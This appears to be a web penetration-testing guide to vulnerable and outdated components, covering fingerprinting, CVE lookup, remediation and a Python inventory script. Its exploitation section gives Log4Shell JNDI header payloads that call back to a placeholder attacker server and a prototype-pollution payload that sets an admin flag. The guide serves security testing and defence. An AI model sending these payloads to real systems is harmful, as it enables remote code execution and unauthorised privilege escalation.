Vulnerable & Outdated Components
Vulnerable and outdated components (OWASP A06:2021) are a leading cause of web application compromise. Modern applications rely on hundreds of third-party libraries — a single vulnerable dependency can provide remote code execution, data exfiltration, or complete system takeover.
Fingerprinting Components
# Detect JavaScript libraries from browser:
# Check page source and network requests for:
# jquery-3.6.0.min.js → jQuery 3.6.0
# angular.js → AngularJS (EOL!)
# react.production.min.js → React
# Automated fingerprinting:
# Wappalyzer (browser extension or CLI)
npx wappalyzer https://target.com
# WhatWeb:
whatweb https://target.com -v
# Check HTTP headers for version info:
curl -sI https://target.com | grep -iE 'server|x-powered|x-aspnet|x-generator'
# Server: Apache/2.4.49 → Known RCE (CVE-2021-41773)
# X-Powered-By: PHP/7.4.3
# Check for exposed package files:
curl -s https://target.com/package.json
curl -s https://target.com/composer.json
curl -s https://target.com/Gemfile
curl -s https://target.com/requirements.txt
curl -s https://target.com/pom.xml
# JavaScript source analysis:
curl -s https://target.com/js/app.js | grep -iE 'version|@license|Copyright'
# WordPress plugin enumeration:
wpscan --url https://target.com --enumerate p,t --api-token YOUR_TOKEN
# Nuclei technology detection:
nuclei -u https://target.com -t technologies/
Vulnerability Lookup
# After identifying components and versions, look up CVEs:
# National Vulnerability Database:
# https://nvd.nist.gov/vuln/search
# Snyk Vulnerability Database:
# https://snyk.io/vuln/
# GitHub Advisory Database:
# https://github.com/advisories
# Retire.js (JavaScript-specific):
npx retire --js --path ./target-js-files/
# Or use the browser extension
# NPM audit (if package-lock.json available):
npm audit --json
# OWASP Dependency-Check:
dependency-check --project "target" --scan ./target-files/
# Trivy (container and filesystem scanning):
trivy fs ./target-source/
trivy image target-docker-image:latest
# Grype (SBOM-based vulnerability scanner):
grype dir:./target-source/
# Nuclei CVE scanning:
nuclei -u https://target.com -t cves/ -severity critical,high
High-Impact Historical CVEs
Critical CVEs to Always Check
- Log4Shell (CVE-2021-44228): Apache Log4j 2.x RCE via JNDI lookup — CVSS 10.0
- Spring4Shell (CVE-2022-22965): Spring Framework RCE via data binding — CVSS 9.8
- Apache Struts (CVE-2017-5638): RCE via Content-Type header (Equifax breach)
- jQuery <3.5.0 (CVE-2020-11022): XSS via HTML parsing in .html() method
- Apache Path Traversal (CVE-2021-41773): Apache 2.4.49 path traversal + RCE
- MOVEit (CVE-2023-34362): SQL injection → RCE in file transfer application
- Prototype Pollution: Multiple NPM packages — lodash, minimist, qs
Exploitation Workflow
# Example: Exploiting Log4Shell
# Step 1: Identify Java application (check headers, error pages)
# Step 2: Inject JNDI payload in various input points:
# Headers to test:
curl -H 'User-Agent: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'X-Forwarded-For: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
curl -H 'Referer: ${jndi:ldap://ATTACKER_SERVER/a}' https://target.com/
# Check for callback on your server:
# Set up listener: python3 -m http.server 8888
# Or use Burp Collaborator / interact.sh
# Example: Exploiting outdated WordPress plugin
# Step 1: wpscan identifies vulnerable plugin:
# "Contact Form 7 < 5.3.2 - Unrestricted File Upload"
# Step 2: Search for exploit:
searchsploit "contact form 7"
# Step 3: Use Metasploit or manual exploitation
# Example: Prototype pollution in Express.js
# If lodash < 4.17.12 is used:
curl -X POST https://target.com/api/merge \
-H 'Content-Type: application/json' \
-d '{"__proto__": {"isAdmin": true}}'
Testing Checklist
1. Fingerprint web server, framework, and CMS versions
2. Identify JavaScript libraries and their versions (source code, Wappalyzer)
3. Check for exposed package manifests (package.json, composer.json, etc.)
4. Run Retire.js against client-side JavaScript
5. Run Nuclei CVE templates against the target
6. Look up identified versions in NVD, Snyk, and GitHub advisories
7. Test for high-profile CVEs (Log4Shell, Spring4Shell, etc.)
8. Check for EOL software that no longer receives security patches
Evidence Collection
Component Inventory: Table of component name, detected version, latest version, known CVEs
CVE References: Link to NVD/advisory with CVSS score for each finding
Exploitation Proof: If exploited, include request/response demonstrating impact
CVSS Range: Depends on the underlying CVE; typically 5.0–10.0, reaching the top of that range for critical RCE vulnerabilities
Remediation
- Maintain SBOM: Create and maintain a Software Bill of Materials for all dependencies.
- Automated scanning: Integrate Dependabot, Snyk, or Renovate into CI/CD pipeline.
- Regular updates: Establish a patch cycle — critical CVEs within 24–48 hours, high within 1 week.
- Remove unused dependencies: Audit and remove packages no longer in use.
- Virtual patching: Use WAF rules to mitigate known CVEs while patches are being deployed.
- Pin versions: Use lock files (package-lock.json, Gemfile.lock) and verify integrity hashes.
False Positive Identification
- CVE without reachable code path: A vulnerable library version doesn't mean the vulnerability is exploitable — verify the vulnerable function/method is actually invoked by the application.
- Backported patches: Linux distributions often backport security fixes without changing the version number (e.g., Apache 2.4.6-97.el7 may include fixes from 2.4.54) — check distribution changelogs.
- Dev/test dependencies: Vulnerabilities in devDependencies that never ship to production are typically informational unless they affect the build pipeline.
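An added example (not part of this page or of any tool it names) that ties the fingerprinting step to the component-inventory table under Evidence Collection and to the backported-patch caveat above: it parses constructed `Server`/`X-Powered-By` headers and `<script>` filenames, matches each version against a small advisory table built from the CVEs listed on this page, and marks distro-tagged versions such as 2.4.6-97.el7 as 'verify-backport' rather than 'vulnerable'. The headers, HTML, EOL set and advisory ranges are all constructed for the example.

```python
"""Constructed example: build a component inventory from fingerprinting output,
flag advisory hits, and treat distro-patched versions (2.4.6-97.el7) as 'verify-backport'."""
import re

# Constructed advisory table from this page: component -> (min_incl, max_excl, ref)
ADVISORIES = {
    "jquery": [((0,), (3, 5, 0), "CVE-2020-11022")],
    "apache": [((2, 4, 49), (2, 4, 50), "CVE-2021-41773")],
    "lodash": [((0,), (4, 17, 12), "prototype pollution")],
}
EOL = {"angular"}  # constructed: libraries without upstream security support
HEADERS = {"Server": "Apache/2.4.49", "X-Powered-By": "PHP/7.4.3"}  # constructed curl -sI output
HTML = """<script src="/js/jquery-3.6.0.min.js"></script>
<script src="/js/lodash-4.17.11.min.js"></script>
<script src="/js/angular.js"></script>"""  # constructed page source

def parse_version(text):
    """'2.4.6-97.el7' -> ((2, 4, 6), True); the flag marks a distro release tag."""
    m = re.match(r"(\d+(?:\.\d+)*)(-[\w.]+)?$", text)
    if not m:
        return None, False
    return tuple(int(x) for x in m.group(1).split(".")), bool(m.group(2))

def detect(headers, html):
    """Collect (component, version-or-None) from version headers and script names."""
    found = []
    for name, value in headers.items():
        m = re.match(r"([A-Za-z-]+)/(\S+)", value)
        if name.lower() in ("server", "x-powered-by") and m:
            found.append((m.group(1).lower(), m.group(2)))
    for src in re.findall(r'src="([^"]+)"', html):
        m = re.search(r"([a-z]+)(?:-(\d+(?:\.\d+)*))?(?:\.min)?\.js$", src)
        if m:
            found.append((m.group(1), m.group(2)))
    return found

def assess(component, version_text):
    """Return (status, references): ok, eol, vulnerable or verify-backport."""
    if version_text is None:
        return ("eol" if component in EOL else "ok"), []
    ver, distro = parse_version(version_text)
    hits = [ref for lo, hi, ref in ADVISORIES.get(component, [])
            if ver is not None and lo <= ver < hi]
    if not hits:
        return "ok", []
    return ("verify-backport" if distro else "vulnerable"), hits

def inventory(headers, html):
    """Rows of (component, version, status, references) for the evidence table."""
    return [(c, v, *assess(c, v)) for c, v in detect(headers, html)]
```

A 'verify-backport' row still needs the distribution changelog checked before it is reported or dismissed; the status only records that the bare version number is not conclusive.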